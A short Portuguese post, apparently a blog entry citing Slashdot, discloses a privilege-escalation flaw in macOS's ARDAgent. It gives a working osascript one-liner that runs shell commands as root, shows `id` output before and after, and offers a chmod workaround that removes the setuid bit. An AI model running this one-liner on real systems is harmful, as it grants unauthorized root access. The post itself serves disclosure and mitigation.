Encontrado BUG de escalação de privilégio no ARDAgent (Apple Remote Desktopt).

Com AppleScript é possivel executar comandos como usuário root.

Veja o exemplo abaixo:

# id

uid=501(eduardomedeiros) gid=20(staff) groups=20(staff),102(com.apple.access_ssh),98(_lpadmin),81(_appserveradm),103(com.apple.sharepoint.group.2),79(_appserverusr),101(com.apple.sharepoint.group.1),80(admin)

Obs: note que estou logado como usuário eduardomedeiros

# osascript -e 'tell app "ARDAgent" to do shell script "id"';

uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),103(com.apple.sharepoint.group.2),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff)

Obs: Repare que a saída do comando id, exibe usuário root.

Solução provisória:

chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

Obs: Ao Reparar as permissões pelo Disk Utility, a permissão do ARD voltará ao estado original.

Fonte: Slashdot.

Abraços.